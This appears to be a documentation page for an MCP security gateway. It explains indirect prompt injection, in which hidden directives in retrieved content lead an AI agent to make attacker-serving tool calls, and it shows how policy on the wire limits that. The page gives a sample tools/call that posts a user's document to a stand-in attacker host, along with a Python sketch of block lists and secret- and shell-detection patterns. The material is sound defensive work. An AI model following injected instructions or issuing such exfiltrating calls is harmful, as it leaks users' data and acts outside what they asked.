## Definition
Prompt injection tricks the model into following attacker-influenced instructions—often by hiding directives inside documents, web pages, or messages the model is asked to summarize.
## How it appears in MCP
The model may issue `tools/call` requests with arguments that serve the attacker (data exfiltration, destructive commands, privilege abuse) while the chat transcript still reads as "helpful."
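For illustration, a poisoned "summarize this page" request could resolve into a wire-level `tools/call` like the sketch below. The tool name and URL are hypothetical, not part of any real server; the point is that the exfiltration happens in structured JSON-RPC traffic, not in the visible transcript:

```json
{
  "jsonrpc": "2.0",
  "id": 42,
  "method": "tools/call",
  "params": {
    "name": "http.post",
    "arguments": {
      "url": "https://attacker.example/collect",
      "body": "<contents of the document the user asked to summarize>"
    }
  }
}
```

Because this is ordinary protocol traffic, a gateway sitting on the wire can inspect and police it without needing to understand the model's intent.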
## Example pattern
Indirect prompt injection in retrieved content has driven real-world data theft and unauthorized actions in agentic systems; MCP tool calls are simply a structured channel for the same class of failure.
## What MCP Trail does on the Guardian path
Guardian does not parse natural-language intent inside the model; it enforces policy on the MCP wire. That still materially limits how far a poisoned prompt can get:
| MCP Trail capability | Why it helps against injection-driven abuse |
|---|---|
| Catalog policies (tools, resources, prompts) | Unknown or high-risk surfaces do not run silently. |
| Per-tool policies (log / block / HITL) | Sensitive `tools/call` paths can require human approval. |
| DLP on arguments and JSON results | Secrets and regulated data are caught in arguments before they reach the upstream server, and in JSON results after it responds. |
| Argument bounds & shell-safety | Oversized or shell-shaped payloads are rejected at the gateway. |
| Tool sequencing & risk | Multi-step chains (for example, export followed by delete) can be gated or denied. |
| Rate limits & budgets | Runaway agent loops cannot burn your MCP tier unchecked. |
| Structured audit | You get evidence of what was blocked, redacted, or approved—not a guess. |
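To make the table concrete, here is a minimal sketch of gateway-side enforcement. All names, policy actions, size limits, and patterns are illustrative assumptions, not MCP Trail's actual configuration format or detection rules:

```python
import re

# Hypothetical per-tool policy table (illustrative names and actions only).
TOOL_POLICIES = {
    "files.read": "log",    # allow, but record in the audit trail
    "db.export": "hitl",    # require human-in-the-loop approval
    "shell.exec": "block",  # never forward upstream
}

MAX_ARG_BYTES = 4096  # example argument-size bound
SHELL_METACHARS = re.compile(r"[;&|`$<>]")  # example shell-safety check
SECRET_PATTERN = re.compile(
    r"(?:AKIA[0-9A-Z]{16}|-----BEGIN [A-Z ]*PRIVATE KEY-----)"
)  # example DLP pattern for AWS keys and PEM private keys

def check_tool_call(tool: str, arguments: dict) -> str:
    """Return 'log', 'hitl', or 'block' for a tools/call request."""
    action = TOOL_POLICIES.get(tool)
    if action is None:
        return "block"  # unknown surfaces do not run silently
    if action == "block":
        return "block"
    for value in arguments.values():
        if not isinstance(value, str):
            continue
        if len(value.encode()) > MAX_ARG_BYTES:
            return "block"  # oversized payload rejected at the gateway
        if SHELL_METACHARS.search(value):
            return "block"  # shell-shaped argument rejected
        if SECRET_PATTERN.search(value):
            return "block"  # DLP hit on an outbound argument
    return action  # 'log' (allow with audit) or 'hitl'
```

None of this requires interpreting the prompt: a poisoned instruction that steers the model toward `shell.exec`, an oversized payload, or a secret-bearing argument is stopped by the same wire-level checks as any other bad request.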
The model layer still matters: Guardian does not remove the need for safe prompting or trusted retrieval. For a deeper technical mapping, read *How Guardian maps MCP threats to controls* and *Argument-level attacks on MCP*.
## What still needs process
Content trust boundaries, retrieval hygiene, and human review for high-risk workflows remain organizational responsibilities that no gateway can automate away.